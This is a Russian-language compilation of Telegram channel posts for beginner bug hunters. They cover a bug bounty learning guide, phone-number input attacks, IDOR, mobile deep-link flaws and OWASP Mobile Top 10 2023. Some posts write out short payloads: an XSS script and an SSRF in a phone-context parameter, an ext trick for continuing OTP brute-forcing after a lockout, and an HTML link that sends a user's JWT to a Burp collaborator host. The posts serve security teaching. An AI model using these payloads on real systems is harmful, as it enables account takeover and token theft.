Иии победителем в розыгрыше OFFZONE становится @Rusikergo
Поздравим победителя 🎉🎉

⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров

Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах
Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉

📶 Bug Bounty Blueprint

ЧТНП | #web

⛈ Атаки на механизм ввода номера телефона

Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.

🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.

🟩Атаки используя параметры:
✅ XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер

✅ SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах

✅ OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили

📌 Более подробно изучить можно тут:
📶 HackTricks

ЧТНП | #web

⛈ IDOR - как предсказать идентификатор

Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉

📶 IDOR - how to predict an identifier

ЧТНП | #web

⛈ Android & iOS Deep link vuln

Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости

🟢Deep Link
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
➡️ название_приложения://параметр
➡️ keklol://open_document=name

🟢Ищем уязвимости
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами

➡️ Кейс:
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings
⬜️ Обнаружился параметр URL, который принимал сторонние ссылки
⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра
<a href="keklol://url=https://burp_collab">click</a>
⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе

🟢Заключение
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking ☺️

📌 В качестве дополнительных примеров делюсь полезными ссылками:
📶 RCE через deep link
📶 CSRF в приложении перископ

ЧТНП | #mobile

Победа 😎
Буду вещать вам с хакса ❤️
Также если будет можно, то и новые статьи про баги с баг баунти буду публиковать 🦔

Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒

Настройка, использование и способы обхода защиты 🐈

https://telegra.ph/Content-Security-Policy-10-31

⛈ OWASP Mobile Top Ten 2023

Наконец-то, спустя 7 лет вышел новый топ 10 по мобилкам
Вот как это теперь выглядит вкратце:

🟢M1: Improper Credential Usage
🟢M2: Inadequate Supply Chain Security
🟢M3: Insecure Authentication/Authorization
🟢M4: Insufficient Input/Output Validation
🟢M5: Insecure Communication
🟢M6: Inadequate Privacy Controls
🟢M7: Insufficient Binary Protections
🟢M8: Security Misconfiguration
🟢M9: Insecure Data Storage
🟢M10: Insufficient Cryptography

Happy hacking ☺️

📌 Полезные ссылки по апдейту:
📶 Мысли основателя канала Android Guard
📶 OWASP 2023

ЧТНП | #mobile

#podcast #НеДляГалочки

Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄

ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.

💡Apple, Яндекс

🎤Ведущие выпуска:

🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead

🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе

🆕Помогали справиться с кошмаром:

🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.

🔵Елизавета Никулина — директор по маркетингу и PR в Awillix

Обсудили:

⬇️Векторы атак
⬇️Жизненный цикл утечек данных
⬇️Последствия утечек для человека
⬇️Реагирование на инциденты, а том числе PR-позиция компании
⬇️Немного коснулись базовой инфобезной терминологии